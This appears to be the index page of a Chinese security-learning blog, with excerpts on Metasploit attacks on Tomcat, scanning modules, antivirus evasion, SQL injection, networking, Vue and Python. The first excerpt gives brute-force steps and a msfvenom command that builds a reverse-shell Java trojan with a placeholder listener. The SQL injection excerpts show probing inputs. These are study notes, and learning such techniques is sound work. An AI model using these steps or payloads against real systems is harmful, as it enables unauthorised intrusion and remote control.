Enderman_1's blog

msf爆破tomcat Tomcat是一款Apache下面的开源的Servlet容器，实现了对Servlet和JSP规范的支持。另外 Tomcat 本身内含了一个 HTTP 服务器，所以也可以被当作一个 Web 服务器来使用。但是Tomcat作为一个Web服务器，它对静态资源的处理能力要比Apache或者Nginx这类的Web服务器差很多，所以我们经常将Apache和Tomcat（或者是Nginx和Tomcat）组合使用，Apache来充当Web服务器处理静态资源的请求，Tomcat充当Servlet容器来处理动态请求。 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP 程序的首选。 步骤 找到后台管理界面 使用 auxiliary/scanner/http/tomcat_mgr_login 模块爆破后台密码 利用msf毒液制作java木马: msfvenom -p java/meterpreter/reverse_tcp lhost=x.x.x.x lport=x ...

MSF工具 msf：metasploit（MSF）是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。 它本身附带数百个已知软件漏洞，是一款专业级漏洞攻击工具 一般kali里面就集成了msf工具，安装了kali就会带有它 我打算通过借助msf工具来初步学习免杀 msf自带的核心模块 exploit 利用模块 payload 攻击载荷模块 auxiliary 辅助模块 post 后渗透模块 encoders 编码模块 evasion 免杀模块 nops 空模块 kali 下msf常用模块所在目录 kali 下msf默认安装目录 /usr/share/metasploit-framework 模块所在目录 /usr/share/metasploit-framework/modules ​ 例如exploits模块所在目录 /usr/share/metasploit-framework/modules/exploits 每个模块对应的文件都能在对应的目录下找到 exploits利用模块 active exploit 直接攻击，适用 ...

msf模块使用主机发现所使用的模块msf下用于做主机发现的模块：auxiliary/scanner/discovery/arp_sweep 使用方法设置ip网段，run 例： 查看当前参数： show options 设置ip网段： set RHOSTS 192.168.3.1/24 润！：run（线程数太少会很慢，先设置成50最好） 端口扫描所使用的模块（这里扫描tcp）auxiliary/scanner/portscan/tcp 使用方法show option查看待设置的参数（待扫描的ip），设置好就能润了 目录扫描所使用模块auxiliary/scanner/http/dir_scanner 使用方法 设置待扫描主机ip 设置默认端口号 设置线程数 润 原理将默认字典里的常用字段（如bank、code）拼接到根目录url的后面，并逐个进行访问，访问成功则说明有这个目录。 在实际使用过程中可以修改所使用的字典达到更好的扫描效果。 总结msf模块使用通用流程： search 命令查找要使用的模块 use 命令使用这个模块 show options 命令查看这个模块待设 ...

免杀基础免杀的概念 免杀，也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面，英文为Anti-AntiVirus（简写Virus AV），逐字翻译为“反-反病毒”，翻译为“反杀毒技术”。 也就是我们常说的bypass AV 杀毒软件分类免费版360安全卫士、火绒、电脑管家等等 收费版也称为企业版（EDR）。对比免费版，企业版的查杀更为严格，特别是针对内存的查杀，比如：卡巴斯基、ESET(NOD32)等等 杀软检测的方式扫描技术 扫描压缩包，对压缩包文件进行分析检查 程序防篡改，避免程序或文件被恶意程序篡改 修复技术，对恶意程序所破坏的文件进行还原 智能扫描，扫描常用磁盘，系统关键位置，时间短 全盘扫描，扫描电脑全盘文件，时间长 勒索软件防护，保护电脑不受勒索软件的攻击 开机扫描，电脑开机时自动扫描，可以扫描压缩文档和不需要的程序 监控技术 内存监控，监控内存中的数据，监控所有进程，当发现内存中存在病毒的时候，就会主动报警 文件监控，当发现写到磁盘上的文件中存在病毒，或者是被病毒感染，就会主动报警 邮件监控，当发现邮件的附件存在病毒时进行拦截 网页防护，阻止 ...

交换机 Ethernet 10Mb/s FastEthernet 100Mb/ GigabitEthernet 1000Mb/s TenGigabitEthernet 10000Mb/s 特殊接口 console 接口： 用来初始化管理电脑的接口 思科机器命名一般思科的交换机开头的数字就表明这台机器是工作在第几层的 如： 2960 — 这是一台工作在第二层的机器 工作在第三层以上的机器才能配ip地址家用路由器家用路由器实际上是一种三层交换机，严格上算是交换机和路由器的杂交产品。 家用路由器通常有五个端口，其中有一个连接外网。其余四个连接内网。 这四个端口是二层端口

SQL注入基础概述一、 原理SQL注入原理： SQL注入利用了程序未能正确过滤、转义或验证用户输入的情况。攻击者通过在用户输入中插入恶意的SQL代码，改变原始查询的逻辑，从而实现对数据库的非法操作。 二、 注入点注入点： 注入点是指程序中的用户输入接收点，通常是网页表单、URL参数或其他用户可控的输入字段。攻击者会利用这些输入点，注入恶意代码来攻击数据库。 三、分类 基于错误的注入： 攻击者通过构造恶意输入，使得SQL语句执行出错，从而获取错误信息，包括数据库结构、数据内容等敏感信息。 基于布尔盲注的注入： 攻击者通过构造恶意输入，利用SQL语句执行结果的布尔值（真或假）来推断出数据库中的信息，逐步获取数据。 基于时间盲注的注入： 攻击者通过构造恶意输入，利用SQL语句的执行时间来推断出数据库中的信息，例如通过延迟执行的SQL语句来判断条件是否满足。 基于联合查询的注入： 攻击者通过在注入点构造特殊的查询语句，利用UNION操作将额外的查询结果合并到原始查询结果中，从而获取额外的数据。 基于堆叠查询的注入： 攻击者通过在注入点构造多个SQL查询语句，并 ...

SQL注入（一）步骤与流程 判断漏洞是否存在 判断注入类型 判断表中列数 确定显示位 获取数据 获取数据库名、版本 获取数据库表名 获取某个表的字段名 获取字段中的记录 判断漏洞是否存在原理： 根据客户端返回的结果来判断提交的测试语句是否成功被数据库引擎执行，如果测试语句被执行了，说 明存在注入漏洞。 一般利用单引号（’）或者双引号（”）来判断是否存在漏洞，如果出现SQL语句错误说明有很大的可能会 存在漏洞。 例子：若后端通过下面语句向数据库获取数据： 1SELECT first_name, last_name FROM users WHERE user_id = '$id'; 正常执行的结果会把符合要求的user_id回显。 然而，如果此时 ‘$id’的值为“ 1‘ ”，那么SQL语句就会变成： 1SELECT first_name,last_name FROM users WHERE user_id = '$id''; 多了一个单引号，因为单引号不匹配，则会报错。如果能引起数据库的报错，说明用户是可以 对查询语句进行修 ...

各层常用协议应用层协议 http https SSH DNS Telnet FTP DHCP SMTP POP3 RDP SMB MySql80 443 22 53 23 20/21 67/68 25 110 3389 445 3306 传输层协议 ​ TCP UDP 传输控制协议 用户数据报协议 网络层协议 ICMPInternet Control Message Protocolinternet控制报文协议 用于在ip主机、路由器之间传递控制消息（网络是否通，主机是否可达）。 IPInternet Protocol网际互连协议：实现大规模、异构网络的互联互通。 ARPAddress Resolution Protocol地址解析协议：根据IP地址获取物理地址的协议 数据链路层协议 PPPPoint-to-Point P ...

vue什么是vuevue是js框架，也就是一堆写好的代码 简单的使用例子1234567891011121314151617181920212223<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title></title> <script src="https://unpkg.com/vue@3"></script> </head> <body> <div id="app"> <h1>{{ title }}</h1> </div> <script> Vue.createApp({ data() { return { title: '零食清单' } ...

Python初学 版本：3.8.0（与python2语法有区别) 变量定义整数： 1i = 5 字符串： 12s = '''This is a multi-line string.This is the second line.''' 诸如此类… 输入1a = input("请输入数据到a") 打印变量打印字符常量： 1print("hello world") 打印变量值： 1print(a) 打印字符变量： 1print(s) 混合类型打印示例： 1print(a,s,"hello world") 尽管a，s，“hello world”三个变量间我们没有指定空格，但是python会自动给他加上空格 输出结果： 5 This is a multi-line string. This is the second line. hello world 控制流语句分支语句1234567891011121314number = 23guess = ...